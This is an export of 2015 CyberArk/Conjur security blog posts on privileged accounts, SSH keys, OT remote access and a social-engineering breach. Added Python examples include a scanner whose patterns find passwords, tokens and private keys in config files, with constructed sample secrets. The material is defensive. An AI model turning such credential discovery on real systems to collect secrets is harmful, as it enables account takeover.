Typically, hosts will run 4 Docker containers at a time, each container having a lifespan of about 3 days. This is interesting because although Docker is used to provide a “knowable, versioned runtime environment”, it is also regularly used to allocate compute resources.

This is great news for Docker and other enterprises that want to package applications for development. As adoption of Docker is quickly increasing so will the need for a complete security solution for docker containers. Conjur’s Dynamic Traffic Authorization platform provides security to Docker containers by giving each container a unique identity.

The containers will also have a unique set of access controls. In order to prevent high-risk credentials from being passed, a temporary token is granted to inbound traffic. With Conjur, containers are able to filter inbound and outbound traffic. A complete audit of all static and ephemeral services makes it easy to see everything going on in your containers’ environment.

Of course, the purpose of using a tool like Docker is to keep your continuous delivery agile. Conjur allows development, operations, security, and compliance teams to move at speed while still being safely managed and monitored.


]]>
New Conjur API Documentation Released https://www.cyberark.com/blog/new-conjur-api-documentation-released/ Tue, 10 Nov 2015 17:29:00 +0000 https://cyberarkvx2.wpengine.com/blog/new-conjur-api-documentation-released/  

Today we’re excited to announce the release of our new API documentation.


We hope the improved content, as well as user experience, will help you leverage Conjur in many different ways going forward.


Why we did it:

  1. All API routes are now documented.
  2. There is now an example for every route, showing a real-world use case.
  3. Routes are now more easily discoverable and linkable.
  4. Documenting our API in a standard spec (API Blueprint) allows us to easily generate Conjur client tooling for any language you require.

Additionally, soon you will be able to make API calls to your Conjur install directly from the API docs. Debugging and learning the API will be much easier.

Check out the API documentation and please feel free to share any feedback in the comments section below.



]]>
7 Essential Resources To Start Your Cloud Transformation https://www.cyberark.com/blog/7-essential-resources-to-start-your-cloud-transformation/ Fri, 06 Nov 2015 19:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/7-essential-resources-to-start-your-cloud-transformation/  

Getting started with a cloud transformation project is a tall task. The sheer amount of technical and cultural decisions that need to be made could make anyone’s head spin. While there will never be a silver bullet solution to help you through the process, it is vitally important to crowdsource others’ experiences before you set out to conquer your goal.

For this post we asked ourselves, if we were starting a massive cloud transformation project, where would we start? The list below is a great entry-to-intermediate level, non-exhaustive summary of some of the resources we hope you find most helpful if you find yourself in a similar situation:

SD Architect

Sanjeev Sharma is a Tech Sales specialist at IBM and author of DevOps for Dummies.  The best part of Sanjeev’s blog is his in-depth coverage of the basics, such as Understand DevOps and Adopting DevOps.  Through a mix of written content, video, and slide presentations, Sanjeev’s content will satisfy all types of learners through the lens of beginner’s eyes.

The Agile Admin

This amazing blog is written by a group of experienced Web systems administrators and developers who met while working at National Instruments.  According to their site, their shared vision is to help turn systems work into a recognized and effective discipline.  They cover a variety of topics such as cloud computing, DevOps, agile operations, infrastructure automation, and Web security.

IT Revolution Press

Gene Kim is well known for his book, The Phoenix Project: A Novel about IT, DevOps, and Helping Your Business Win. Gene’s blog, IT Revolution Press, focuses on the economic and human costs of cloud transformation. As the site explains, “We aim to positively influence the lives of 1 million IT people over the next 5 years. To make this happen, we’re uniting thought leaders in all the relevant domains with a common sense of purpose and passion to help us achieve our goal and improve IT for generations to come.”

Arrested DevOps [Podcast]

If you like to digest your content by way of audio, then this podcast is a must listen. Arrested DevOps is hosted by Matt Stratton, Trevor Hess, and Bridget Kromhout. They describe their podcast as one that helps listeners achieve understanding, develop good practices, and operate their teams and businesses for maximum DevOps awesomeness. With dozens of podcasts ranging in topic from ‘What is DevOps’ to ‘ITIL Eye for the DevOps Folks’, there are a lot of great lessons to learn from these front-line experts.

DevOps Guys

The DevOps Guys, otherwise known as Steve Thair and James Smith, provide a forum based on their over 15 years of experience that aims to facilitate, share, and explore DevOps best practices. They hope their blog inspires others to share their experiences so the next generation of leaders can get a head start at transforming their IT environments.

DevOps.com

Launched in 2014, DevOps.com has quickly established itself as an indispensable resource for DevOps education and community building. They make it their mission to cover all aspects of DevOps—philosophy, tools, business impact, best practices and more.  Their content includes in-depth features, bylined articles, blog posts and breaking news about the topics that resonate with IT readers interested in DevOps.

Do you have any other websites, blogs, subreddits, or podcasts that have helped your organization begin to shift how your IT and applications are deployed and managed? If so, please share below in the comments.

]]>
Privileged Credentials within Commercial off-the-shelf (COTS) Applications Creates an Exponential Security Threat https://www.cyberark.com/blog/privileged-credentials-within-commercial-off-the-shelf-cots-applications-creates-an-exponential-security-threat/ Thu, 05 Nov 2015 20:44:47 +0000 https://www.cyberark.com/blog//

CyberArk’s Executive Vice President Adam Bosnian regularly talks to customers, partners and security experts. He is also frequently invited to conferences to address security trends, so we’d like to share some of his recent insights.

Q1: What trends do you see in the market related to privileged account security?

Adam:  Most information security professionals recognize that the cyber security battleground has shifted from the network perimeter to the inside of the enterprise. Often attackers seek to exploit privileged accounts specifically, given the extensive control and access to sensitive data they provide. As a result, the need to secure, manage and track privileged account access is increasingly understood and accepted. Many C-level security professionals have enterprise-wide mandates to address what is now viewed as a horizontal risk.

Despite this widespread understanding of the importance of locking down privileged account access, some continue to equate privileged credentials with IT admin users alone. The reality is that access is not limited to users with a “heart beat,” and in fact, many COTS applications often require the same access to privileged accounts. Recognition of this security risk is growing, and we’ve had a number of our customers and software application partners contact us to help them more effectively address this vulnerability. Ultimately, an enterprise-wide privileged access mandate should cover all “sources” of privileged users/access to be effective.

Q2: So, COTS applications use the SAME level of privileged access to target systems as IT Admins?

Adam: Yes, they do, and awareness of this security vector is low, but growing. Many COTS applications require some privileged access to perform necessary functions. Whether it is a vulnerability or asset discovery application or an IT operations management service, administrative privileges are provided by the organization to access virtually every asset on the network.

These privileged credentials are usually defined once for each application and reside in applications or scripts, or they are stored in configuration files within networks, servers and databases. With hundreds of commercial application privileged credentials to manage manually, and for the sake of operational simplicity, these credentials have remained unchanged.

As a result, each application becomes a significant threat and potential pathway for cyber attackers. Understanding the relationship between privileged credentials and COTS applications has become an “ah-ha” moment for our customers and partners. They want to have a centralized credential management system in place covering all types of access, regardless of whether it is by an IT user or a COTS application.

Q3: How should organizations secure critical COTS applications?

Adam: They should stop using credentials that are statically stored in the COTS application, databases, scripts or configuration files, as these can easily be captured by attackers. They need a system to automatically manage, secure and rotate credentialed access to privileged accounts.

Companies will often start with a discovery process to inventory the applications they have organization-wide and pinpoint what vulnerabilities exist. There are tools specifically designed to scan the entire IT environment to find privileged user AND application accounts, and the associated credentials. A growing number of customers have asked the application vendors they use (often our partners) to work with us to securely manage the access their applications require.

For example, CyberArk offers integrations of CyberArk Application Identity Manager™ with leading commercial IT applications. Together, we help our shared customers to eliminate credentials (passwords and SSH keys) from commercial applications, application scripts and/or configuration files. Instead, they store them in the CyberArk Digital Vault® and automatically rotate the credentials used to authenticate to the organization’s target systems. With CyberArk Application Identity Manager, organizations will not only reduce the risk of unauthorized application credential usage and be able to detect and alert on credential usage anomalies, but will also simplify credential management.

Q4: Is this focus on securing applications new?

No. In fact, CyberArk Application Identity Manager has been available and used by many of our customers for years. Early on, companies used to manage in-house applications with this product, but as awareness around the security risks associated with privileged accounts increases, companies are paying closer attention to vulnerabilities associated with COTS applications as part of their holistic privileged account security strategy.

To learn more about how CyberArk can help you address your privileged account risk and secure privileged credentials accessed by both users and applications, download our free eBook, Seven Things To Consider When Evaluating Privileged Account Security Solutions.
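A small discovery pass of the kind the interview describes, added here as an example and not CyberArk’s tooling: it walks constructed configuration files and scripts (hypothetical paths and values), reports credentials that are embedded statically with their values redacted, and skips values that defer to a vault or environment lookup, which is the pattern the answers recommend.

```python
"""Discovery pass for credentials embedded statically in application
configuration files and scripts.

Added example, not CyberArk's tooling: file contents and paths below are
constructed to stand in for what a scan of an application host would read.
"""
import re
from dataclasses import dataclass

SAMPLE_FILES = {
    "/opt/scanner/etc/scanner.conf": (
        "[target]\n"
        "host = db01.internal\n"
        "user = svc_scanner\n"
        "# password = changeme\n"          # commented out: not a live credential
        "password = Winter2015!\n"
    ),
    "/opt/itom/bin/collect.sh": (
        "#!/bin/sh\n"
        'export API_TOKEN="tok_5f2a9c0e"\n'
        'DB_PASS="${DB_PASS_FROM_VAULT}"  # injected at runtime, not static\n'
    ),
    "/etc/app/settings.properties": (
        "db.user=app_runtime\n"
        "db.password=hunter2\n"
    ),
    "/etc/app/deploy.key": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "(constructed: key material omitted)\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
}

# Keys whose name suggests a credential, assigned with '=' or ':'.
CREDENTIAL_KEY = re.compile(
    r"^\s*(?:export\s+)?"
    r"(?P<key>[\w.-]*(?:pass(?:w(?:or)?d)?|secret|token|api[_-]?key|private[_-]?key)[\w.-]*)"
    r"\s*[=:]\s*(?P<value>.+?)\s*$",
    re.IGNORECASE,
)
PEM_HEADER = re.compile(r"^-----BEGIN [A-Z ]*PRIVATE KEY-----$")
# A value that defers to the environment or a vault lookup is the pattern
# the interview recommends, so it is not reported.
INDIRECT_VALUE = re.compile(r"^(?:\$\{|\$\(|%\()")
COMMENT_PREFIXES = ("#", ";", "//")


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    key: str
    redacted: str


def clean_value(raw: str) -> str:
    """Strip quotes and trailing inline comments from an assigned value."""
    raw = raw.strip()
    if raw[:1] in ("'", '"'):
        end = raw.find(raw[0], 1)
        return raw[1:end] if end > 0 else raw[1:]
    return re.split(r"\s+[#;]", raw, maxsplit=1)[0].strip()


def redact(value: str) -> str:
    """Keep only a short prefix so the report never carries the secret itself."""
    return value[:2] + "***" if len(value) > 2 else "***"


def scan_text(path: str, text: str) -> list[Finding]:
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith(COMMENT_PREFIXES):
            continue
        if PEM_HEADER.match(stripped):
            findings.append(Finding(path, line_no, "PEM private key", "***"))
            continue
        match = CREDENTIAL_KEY.match(line)
        if not match:
            continue
        value = clean_value(match.group("value"))
        if not value or INDIRECT_VALUE.match(value):
            continue
        findings.append(Finding(path, line_no, match.group("key"), redact(value)))
    return findings


def scan_files(files: dict[str, str]) -> list[Finding]:
    """Scan every file; the result is the inventory to move into managed storage."""
    return [f for path, text in files.items() for f in scan_text(path, text)]


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no}  {f.key} = {f.redacted}")
```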

]]>
Proactive Preventive Measures or Remediation: Same Actions, Different Timing https://www.cyberark.com/blog/proactive-preventive-measures-or-remediation-same-actions-different-timing/ Tue, 03 Nov 2015 18:19:41 +0000 https://www.cyberark.com/blog//

Three measures to protect privileged accounts

Benjamin Franklin once famously said, “An ounce of prevention is worth a pound of cure.” Cyber attacks are now common worldwide – Anthem, Carphone Warehouse, the German parliament, K Box Singapore, Sony Pictures, TV5Monde and the U.S. Office of Personnel Management (OPM) – and they take a tremendous economic toll. Industry estimates show that malicious cyber activities worldwide cost $300 billion to $1 trillion in losses annually.

The world’s top cyber investigators continue to see a common thread across these dangerous, targeted attacks and security breaches: the exploitation of privileged accounts. These accounts grant extensive control over sensitive data and IT systems, they’re pervasive in every organization, they’re often overlooked and therefore present a path of least resistance, and they can be powerful weapons in the wrong hands.

As the leader of CyberArk’s consulting services, my team and I regularly work with organizations, during and immediately following security incidents, to rapidly introduce controls on privileged accounts. Lessons learned from these events can be used to proactively protect against threats. Experience shows the recommendations really aren’t optional; it’s just a matter of time before organizations will have to implement them, and if it’s in response to a breach, it will be more painful.

At a high level, there are three recommended measures every company should take to proactively protect privileged accounts:

  1. Reduce the attack surface. The sheer volume of existing privileged accounts makes effective controls unwieldy and this creates an easy path for attackers. Don’t make it easy for them; reduce the number of privileged accounts – both shared and personal. Review your sensitive groups – think “Domain Admins” – and fiercely question whether the privilege is necessary. Eliminate accounts entirely where possible. Personal privileged accounts are difficult to control. They possess the same privileges as your shared accounts, but also face the classic challenges of human identity management. For our customers, we recommend removing personal privileged accounts and replacing them with shared accounts via CyberArk technology. Ultimately, these accounts require the same level of control, and this approach reduces IdM overhead and vastly improves security.
  2. Isolate sensitive assets and accounts. Sensitive assets and highly privileged accounts should never be accessed directly from workstations. Workstations are often an attacker’s beachhead, and determined attackers can find ways to reach them. Preventing privileged accounts from crossing trust levels, i.e. not using the same account to access servers and workstations, and isolating sensitive assets by restricting access to a highly secure working environment is essential to contain an attacker’s ability to complete their mission.
  3. Protect privilege with strong authentication. Deploying native two-factor authentication integrations across all technology platforms is complex, time consuming, and for legacy (and often business critical) technologies often exceedingly difficult. Despite these challenges, deploying strong authentication is essential to protect systems and sensitive data.

For our customers, we recommend isolating privileged sessions and replacing personal privileged accounts with CyberArk-controlled shared accounts.  This can simplify the strong authentication objective by being the intermediary for privileged access and thereby enforcing strong authentication requirements across the board.

For additional tips on protecting privileged accounts, you can also read our Best Practices Guide: The Three Phases of Securing Privileged Accounts.

]]>
The Director of the CIA Hacked, By A High Schooler https://www.cyberark.com/blog/the-director-of-the-cia-hacked-by-a-high-schooler/ Mon, 02 Nov 2015 16:32:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-director-of-the-cia-hacked-by-a-high-schooler/  

The personal AOL account of CIA Director John Brennan was recently hacked by a couple of high school students. When we think about the CIA we typically imagine savvy spies and futuristic technologies. The reality, however, seems a lot less impressive after learning that the email security for the CIA is about as impenetrable as our own. 

This was not a high-tech breach; these were no expert hackers or highly skilled coders. This was just a few kids who got creative and were able to breach the email of one of the most powerful members of the CIA. You would think that government officials, who are privy to sensitive information on a daily basis, would work harder to make sure their data was secure. But this story shouldn’t surprise us: in 2014, 783 data breaches were reported, and in those breaches at least 85.61 million records were compromised. However, I think we are still shocked when some of the most powerful people in society get breached, as they have the means and resources to strive for better.

Here are all of the details:

The New York Post reports that, according to the hacker, the email account also had information about the government’s use of “harsh interrogation techniques”. It is assumed that the hacker will likely face criminal charges in order to set an example and deter other hackers from trying something similar in the future.

Wired covers the report given by the supposed high-school-aged hacker of how he carried out the breach. The hacker says he posed as a Verizon worker and had two friends help him. The group also hacked into the Comcast account of Homeland Security Secretary Jeh Johnson.

This article by Amanda Vicinanzo points out that despite the number of high-profile, costly breaches that occur on what seems like a weekly basis, cybersecurity still is not taken very seriously. This attack was less sophisticated than most, with the hacker using social engineering to gain access to Mr. Brennan’s personal AOL account.

Brennan argues that he wasn’t being negligent with his personal email. The truth remains, however, that he had highly sensitive information in his email account, including the personal information and social security numbers of the CIA’s top intelligence officials and his confidential 47-page application for security clearance. This alarming lack of accountability and responsibility doesn’t help matters much, as it begs the question: will he be more careful in the future? If he is unwilling to take even some responsibility for the breach, why would he bother changing his habits?

There will always be hackers, there will always be bad guys trying to infiltrate our systems. If we are going to hold on to sensitive data we have an obligation to take every possible step to make sure it remains secure.

Want to learn more about securing your secrets? Check out our secrets management checklist.

]]>
Fast Facts: Noteworthy Cyber Security Statistics https://www.cyberark.com/blog/fast-facts-noteworthy-cyber-security-statistics/ Fri, 30 Oct 2015 19:02:41 +0000 https://www.cyberark.com/blog//

October is National Cyber Security Awareness Month (CSAM), and a lot of great information, highlighting tips and best practices, has been shared to inform businesses and individuals. In support of #CyberAware, we’ve compiled a selection of interesting statistics and insights about cyber security incidents and threat vectors.

At-a-glance:

The cyber security disconnect:

The National Cyber Security Alliance has put together a helpful list of free resources to help organizations and individuals stay safe online. For tips on how to protect your organization’s most valuable assets, be sure to visit the CyberArk Resource Center.

]]>
5 IT Best Practices that Also Mitigate Cyber Security Vulnerabilities in OT https://www.cyberark.com/blog/5-it-best-practices-that-also-mitigate-cyber-security-vulnerabilities-in-ot/ Thu, 29 Oct 2015 18:54:57 +0000 https://www.cyberark.com/blog//

Recently, I attended NERC’s annual Grid Security Conference (GridSecCon) in Philadelphia. A group of cyber security and other industry experts convened to share best practices, lessons learned and emerging security trends. Protecting the grid was the topic on everyone’s mind as well as the theme for the conference. As the sophistication and number of cyber attacks on critical infrastructure increases, it’s more important than ever to understand the landscape of entry points. This landscape extends to remote entry points. So it’s no surprise that supply chain security was also a hot topic of discussion at the conference, particularly in light of a string of recent breaches that demonstrate some of the vulnerabilities exposed by unsecured remote user access.

In Operational Technology (OT), supply chain management includes the oversight of users, both internal and external to the organization, who require access to the industrial control system networks in order to perform a myriad of functions ranging from preventive maintenance to reporting to break-fix services. These remote users perform critical functions that contribute to the plant’s reliable operations. However, remote access into a plant’s industrial control system exposes additional vulnerabilities that can be exploited by malicious actors.

The energy sector is leading the way in taking measures to secure critical assets and share information about remote access best practices and technologies that help to mitigate the impact of a potential cyber-attack. A number of security measures implemented by energy companies can be extended into other industries, and in fact, some of the measures are part of other standards and best practices such as the NIST 800-82 Revision 2: Industrial Control System (ICS) security.

To better protect your organization from threats associated with remote access, consider implementing the following five practices to address IT-OT connectivity vulnerabilities:

  1. Identify all remote users, accounts and associated credentials. Be sure to include SSH keys, hard-coded credentials and passwords to get visibility into who is accessing an organization’s critical systems.
  2. Lock down credentials. Once all remote users, accounts and credentials are identified, it’s time to centrally store the credentials in a locked and safe environment where they can be more effectively managed. The users can then securely retrieve the password or SSH key, or request a direct connection to only the accounts they are authorized to access.
  3. Minimize direct connection to critical assets. Isolating all sessions originating outside of the ICS domain and from unmanaged devices minimizes direct connections to any critical assets and keeps credentials shielded from unauthorized users.
  4. Trust but verify – keep an eye on remote users. Implementing live monitoring and session recording can facilitate the identification of unauthorized activity. It can also help to confirm that remote users access only those systems they are authorized to see. Session monitoring and logging also supports compliance with industry regulations and standards.
  5. Deploy analytics tools. To meet high availability requirements, early detection and alerts are key. Analytics tools can identify user and application patterns which in turn can be used to create privileged user and account profiles of normal behavior. When abnormal activity is detected and alerted, incident response teams can address and disrupt in-progress attacks.
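As an added illustration of practices 4 and 5 (example code, not CyberArk’s analytics), the following builds a per-user profile of normal remote sessions from a constructed history and flags new sessions that depart from it; the users, jump hosts and ICS asset names are invented, and the rules (new source, new target, off-hours, unusually long session) are a deliberately simple stand-in for a real baseline.

```python
"""Baseline-and-deviation check for remote sessions into an ICS network.

Added example, not CyberArk's analytics: users, hosts and assets below are
constructed, and the rules are a simple illustration of profiling normal
behaviour per remote user and alerting on departures from it.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Session:
    user: str
    source: str        # where the session originated (jump host, device)
    target: str        # ICS asset reached
    hour: int          # local plant hour, 0-23
    minutes: int       # session duration


@dataclass
class Profile:
    sources: set = field(default_factory=set)
    targets: set = field(default_factory=set)
    hours: set = field(default_factory=set)
    max_minutes: int = 0


# Constructed history of recorded vendor and contractor sessions.
HISTORY = [
    Session("vendor_hvac", "jump01", "plc-hvac-1", 9, 30),
    Session("vendor_hvac", "jump01", "plc-hvac-1", 10, 45),
    Session("vendor_hvac", "jump01", "plc-hvac-1", 14, 40),
    Session("vendor_hvac", "jump01", "hmi-boiler-2", 13, 20),
    Session("contractor_pm", "jump02", "historian-1", 8, 60),
    Session("contractor_pm", "jump02", "historian-1", 9, 50),
    Session("contractor_pm", "jump02", "historian-1", 10, 55),
]


def build_profiles(history):
    """Fold recorded sessions into one profile of normal behaviour per user."""
    profiles = defaultdict(Profile)
    for s in history:
        p = profiles[s.user]
        p.sources.add(s.source)
        p.targets.add(s.target)
        p.hours.add(s.hour)
        p.max_minutes = max(p.max_minutes, s.minutes)
    return dict(profiles)


def assess(session, profiles):
    """Return the reasons a session departs from its user's profile (empty = normal)."""
    p = profiles.get(session.user)
    if p is None:
        return ["no history for user"]
    reasons = []
    if session.source not in p.sources:
        reasons.append(f"new source {session.source}")
    if session.target not in p.targets:
        reasons.append(f"new target {session.target}")
    # Allow one hour of slack either side of the hours seen in the history.
    if not any(abs(session.hour - h) <= 1 for h in p.hours):
        reasons.append(f"off-hours ({session.hour:02d}:00)")
    if session.minutes > 2 * p.max_minutes:
        reasons.append(f"duration {session.minutes} min exceeds 2x historical max")
    return reasons


def triage(sessions, profiles):
    """Pair each anomalous session with its reasons; normal sessions are dropped."""
    return [(s, r) for s in sessions if (r := assess(s, profiles))]


# Constructed new sessions to evaluate against the baseline.
NEW_SESSIONS = [
    Session("vendor_hvac", "jump01", "plc-hvac-1", 10, 30),        # normal
    Session("vendor_hvac", "jump01", "plc-turbine-3", 2, 30),      # new asset at 02:00
    Session("contractor_pm", "laptop-unknown", "historian-1", 9, 240),
    Session("svc_remote", "jump01", "plc-hvac-1", 9, 10),          # never seen before
]

if __name__ == "__main__":
    for s, reasons in triage(NEW_SESSIONS, build_profiles(HISTORY)):
        print(f"ALERT {s.user} -> {s.target}: {'; '.join(reasons)}")
```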
]]>
5 SSH Best Practices You Can Start Implementing Today https://www.cyberark.com/blog/5-ssh-best-practices-you-can-start-implementing-today/ Wed, 28 Oct 2015 20:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/5-ssh-best-practices-you-can-start-implementing-today/  

As cybersecurity month is coming to a close, it seems only fitting to provide you with some advice on maintaining your enterprise’s security all year long.

One of the hardest things to manage in large, agile enterprises is SSH keys. As your infrastructure grows, so will the number of SSH keys and privileged accounts that you need to manage, and as these numbers hit the thousands, administering and maintaining these roles will be difficult.

A study by the Ponemon Institute found that 51% of organizations aren’t even aware of how many keys and certificates are used by their organization. Not knowing where or how these keys and certificates are being used means that an enterprise is completely vulnerable to attacks. These attacks on trust are very costly since they are so difficult to detect, usually targeting acute areas. Follow our SSH best practices to ensure that security isn’t neglected for the sake of agility.

Here are 5 SSH best practices you can start implementing today:

1) Don’t confuse Authorization with Authentication.

Authentication is used to establish identity; authorization is used to determine access levels and permissions. For more detail check out this blog post.

2) Always Audit

It is critical to keep a constant log of both the failed and successful login attempts of all of your hosts.  A public key pushing system won’t tell you the difference between a stranger claiming to be someone you know and someone you know trying to access information that they aren’t authorized to access.

3) Don’t Share Your Private Key…EVER.

Although Public Keys shouldn’t be treated like secrets, private keys should.  Never distribute your private key to any system or person; if you need to authenticate yourself  just share your public key. Remember: Your public key is safely sharable but your private key is not.

4) Schedule SSH Key Rotation

Key rotation should always be part of your overall security plan. If you work under strict regulatory and compliance laws then this is especially important.  Find a tool that not only easily rotates your keys, but also keeps an audit log of which keys were rotated and when.

5) Centralized Key Management

Each developer should have their own unique login and set of privileges. This way, you can easily create and delete SSH keys. Don’t use manual methods to distribute and create SSH keys; this non-automatic system won’t remain secure or scalable as your environment grows.
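The audit from practice 2, combined with a check that supports practice 3, as an added example that is not from the post: it parses constructed sshd log lines in the OpenSSH syslog format, summarises which key fingerprints are accepted on which host and account, counts failed attempts per source, and reports any fingerprint accepted for more than one account, which is a sign that a private key is being shared. Host names, IPs and fingerprints are invented.

```python
"""Summarise sshd authentication log lines: which key fingerprints are
accepted where, which sources keep failing, and which fingerprints are used
by more than one account (a sign that a private key is being shared).

Added example, not from the post; the log lines are constructed in the
OpenSSH syslog format and the hosts, users and fingerprints are invented.
"""
import re
from collections import Counter, defaultdict

TS = r"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
AUTH_RE = re.compile(
    TS + r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
    r"(?:: (?P<keytype>\S+) (?P<fp>SHA256:\S+))?$"
)
INVALID_RE = re.compile(TS + r"Invalid user (?P<user>\S+) from (?P<src>\S+) port \d+$")

# Constructed sample: two hosts, one deploy key reused by a second account.
SAMPLE_LOG = """\
Oct 28 09:12:01 web01 sshd[2210]: Accepted publickey for deploy from 10.0.1.5 port 51234 ssh2: RSA SHA256:c0nStrUctEdFp1
Oct 28 09:13:44 web01 sshd[2215]: Failed publickey for root from 203.0.113.9 port 40022 ssh2: RSA SHA256:c0nStrUctEdFp2
Oct 28 09:14:02 web01 sshd[2220]: Invalid user admin from 203.0.113.9 port 40030
Oct 28 09:14:03 web01 sshd[2220]: Failed password for invalid user admin from 203.0.113.9 port 40030 ssh2
Oct 28 09:15:10 db01 sshd[3310]: Accepted publickey for deploy from 10.0.1.5 port 51240 ssh2: ED25519 SHA256:c0nStrUctEdFp3
Oct 28 09:16:22 db01 sshd[3315]: Accepted publickey for alice from 10.0.2.8 port 50012 ssh2: RSA SHA256:c0nStrUctEdFp1
Oct 28 09:17:00 db01 sshd[3320]: Failed password for deploy from 198.51.100.7 port 3344 ssh2
"""


def parse_line(line):
    """Return a dict of fields for an authentication-relevant line, else None."""
    m = AUTH_RE.match(line) or INVALID_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields.setdefault("result", "Invalid")   # INVALID_RE has no result group
    return fields


def summarize(lines):
    """Build the audit view: accepted keys per (host, user), failures per source."""
    accepted = defaultdict(set)      # fingerprint -> {(host, user)}
    failed_by_source = Counter()     # source IP -> failed attempts
    invalid_users = set()
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        if f["result"] == "Accepted" and f.get("fp"):
            accepted[f["fp"]].add((f["host"], f["user"]))
        elif f["result"] == "Failed":
            failed_by_source[f["src"]] += 1
        elif f["result"] == "Invalid":
            invalid_users.add(f["user"])
    return {
        "accepted": {fp: sorted(uses) for fp, uses in accepted.items()},
        "failed_by_source": dict(failed_by_source),
        "invalid_users": sorted(invalid_users),
    }


def shared_keys(report):
    """Fingerprints accepted for more than one distinct account: likely a shared private key."""
    return sorted(fp for fp, uses in report["accepted"].items()
                  if len({user for _host, user in uses}) > 1)


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG.splitlines())
    for fp, uses in report["accepted"].items():
        print(fp, "accepted for", uses)
    print("failures by source:", report["failed_by_source"])
    print("invalid users tried:", report["invalid_users"])
    print("fingerprints used by several accounts:", shared_keys(report))
```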

Want more tips like this? Subscribe to our blog and keep up with the latest information in IT Security.

]]>
New Conjur CLI v4.28.0 Release https://www.cyberark.com/blog/new-conjur-cli-v4-28-0-release/ Wed, 28 Oct 2015 15:54:00 +0000 https://cyberarkvx2.wpengine.com/blog/new-conjur-cli-v4-28-0-release/  

We have just released Conjur CLI v4.28.0!

The big change is that you can now retire policies. Read more about policies here.

These bugs were also fixed:

  • Fix --as-group and --as-role options for conjur policy load. Either can now be used to specify ownership of the policy.
  • Fix --follow option for conjur audit.

We have also removed support for per-project .conjurrc files. This was a legacy feature that doesn’t fit with the modern Conjur workflow.

Head to the Conjur devsite to download the updated CLI: https://developer.conjur.net/cli

]]>
PuppetConf 2015 Recap https://www.cyberark.com/blog/puppetconf-2015-recap/ Tue, 27 Oct 2015 15:43:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppetconf-2015-recap/  

During the first week of October I had the pleasure of attending my first PuppetConf in lovely Portland, Oregon.  Armed with plenty of swag, a smile, and a can’t-miss raffle prize (6 month memberships to the Bacon of the Month Club as well as the Craft Beer of the Month Club), I was ready for action.

An enthusiastic attendee asked, “Is this what you guys do? Beer & Bacon?!” After a back-and-forth about Conjur’s security orchestration platform for dynamic infrastructure, he wanted two things: “First, get me that info on Conjur’s Puppet, Jenkins, and Docker solutions. And then, make sure I win that beer & bacon.”

(Top 10 ‘why I should win the beer & bacon’ notes at the end.)

One more thing pulled new and veteran Puppeteers to the booth, the eye candy that is the revamped Conjur UI:


As one visitor put it, “My security folks are just gonna love that magenta.”

Once the UI-gazers & beer/bacon lovers learned that Conjur VP Josh Bregman was giving a talk on Using Puppet with a Secrets Server, the questions poured out:

  • “So, what exactly does Conjur do?”

– Conjur orchestrates privileged user and machine identity at scale.

  • “Do you integrate with other tools in addition to Puppet?”

– Yes

  • “What if we have LDAP and AD?”

– That’s fine. Conjur offers both LDAP & AD sync.

  • “Is Conjur open-source?”

– Conjur is an enterprise-grade platform.  We do have an open-source secrets project called Summon.

  • “How do I get to see it in action?”

– Request a live demo, and I’ll get in touch with you.

All our conversations confirmed something important: even for organizations sending people to PuppetConf, maturity varies widely. Puppet is both brand new and second nature; containers are in test almost everywhere, and even in production some places; better continuous integration and delivery are across-the-board goals. Throughout all of it, though, shone an eagerness for anything that helps manage credentials and keys more securely, and scales across HA environments better than boot-strapped, home-grown, or open-source tools. This strikes a particular note for us here at Conjur.

Increasingly gone seem the days when security, audit, and compliance were ‘someone’s problem.’ Agile development has really begun putting a face to that ‘someone,’ and everyone involved is beginning to realize that that face looks a lot like the one they see in the mirror.

The one I see needs to get back to pre-PuppetConf amounts of bacon – turns out, talking about that and beer repeatedly for three days apparently has one or two longer-lasting consequences. I’m sure that our winner will be able to show more restraint as he enjoys those 6 months of craft beer and bacon with the perfect shirt to wear while he does.

A great thanks to all those who came and talked Conjur, as well as to our fellow vendors, the conference team and, of course, Puppet Labs. Looking forward to sunny San Diego next year!

Now, for the Top 10 reasons people gave for why they should win the beer & bacon (even though they knew it wouldn’t help them do so):

10. “Thank You!” – presumptive close, nice

9. “Pik M3” – time-saver spelling

8. “I like hops” – hoppy bacon?

7. “Because you love me!!!” – even more presumptive close, nicer?

6. “Beets, Bears, and Battlestar Galactica.” – awesome alliteration

5. “BACONNNNNNN” – 7 N’s spell enthusiasm

4. “Beardo!” – missing verse from Ole McDonald

3. “I want t-shirt” – caveman-esque brevity

2. “Eh, anything you want to put in there!” – word for word what I said when he asked what to write.

1. “I’d really like to win because I am bacon and beer’s best fan on the planet, and since the recent discovery of water on mars, quite possibly the solar system.” – we’ll just have to ask Matt Damon.

]]>
Do You Know Where Your Secrets Are? https://www.cyberark.com/blog/do-you-know-where-your-secrets-are/ Fri, 16 Oct 2015 15:13:00 +0000 https://cyberarkvx2.wpengine.com/blog/do-you-know-where-your-secrets-are/  

October isn’t just about apple picking, hayrides, and pumpkin spice lattes… it’s also cybersecurity month! Although Conjur kicked the month off on the right foot, the same can’t be said for everyone. It looks like cybersecurity month is off to a rough start at Scottrade, the business having suffered a major breach that was publicized in recent weeks.

